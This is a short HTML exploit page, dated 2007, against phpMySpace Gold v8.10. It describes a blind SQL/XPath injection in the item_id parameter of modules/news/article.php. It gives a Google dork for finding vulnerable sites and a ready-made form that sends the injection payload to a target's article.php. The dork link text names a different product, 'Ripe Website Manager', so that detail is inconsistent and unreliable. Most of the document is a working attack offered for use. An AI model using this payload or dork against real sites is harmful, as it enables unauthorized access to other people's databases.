phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit
<!--
phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit
Vulnerable Variable: item_id
Vulnerable File: modules/news/article.php
Vulnerable: phpMySpace Gold v8.10 (other versions should also be vulnerable)
Google d0rk: "Powered by phpMySpace Gold 8.10"
John Martinelli
john@xxxxxxxxxxxxxx
http://john-martinelli.com
April 22nd, 2007
!-->
<html>
<head><title>phpMySpace Gold (v8.10) - Blind SQL/XPath Injection
Exploit</title><body>
<center><br><br><font size=4>phpMySpace Gold (v8.10) - Blind SQL/XPath
Injection Exploit</font><br><font size=3>discovered by <a
href="http://john-martinelli.com">John Martinelli</a><br><br>Google d0rk: <a
href="http://www.google.com/search?q=+%22Powered+by+phpMySpace+Gold+8.10%22">"Powered
by Ripe Website Manager"</a></font><br>
<br><br>
<form action="http://www.example.com/path/modules/news/article.php"
method="get">
<input name="mode" type="hidden" value="0">
<input name="order" type="hidden" value="0">
<input name="item_id" size=75 value="1" AND "1"="0">
<input type=submit value="Execute SQL Injection" class="button">
</form>
</body></html>